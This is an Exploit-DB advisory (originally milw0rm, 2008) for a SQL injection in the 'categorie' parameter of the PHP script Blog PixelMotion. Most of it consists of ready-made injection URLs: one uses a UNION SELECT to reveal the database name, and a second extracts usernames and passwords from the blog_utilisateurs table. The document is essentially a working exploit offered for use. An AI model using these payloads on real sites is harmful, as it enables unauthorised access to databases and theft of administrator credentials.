Blog PixelMotion - 'categorie' SQL Injection

EDB-ID:

5382


Author:

parad0x

Type:

webapps


Platform:

PHP

Date:

2008-04-06


Blog Pixel Motion Sql Injection Vulnerability
-------------------------------------------------------------------------------------------------
# Author  : parad0x
# Home   : www.inso.host.sk
# Script  : Blog PixelMotion 
# Download  : http://www.pixelmotion.org/zip/blog.zip
-------------------------------------------------------------------------------------------------
http://[target]/index.php?categorie=[SQL]

-------------------------------------------------------------------------------------------------
Example:

http://www.xxx.org/blog/index.php?categorie=-1+union+select+0,1,2,database(),4,5,6/*
-------------------------------------------------------------------------------------------------
greetz : VoLqaN
-------------------------------------------------------------------------------------------------

side note (thanks C0D3R-DZ):
http://localhost/[script_path]/index.php?categorie=-1+union+select+1,2,concat(login,0x3a,pass),4,5,6+from+blog_utilisateurs/*

# milw0rm.com [2008-04-06]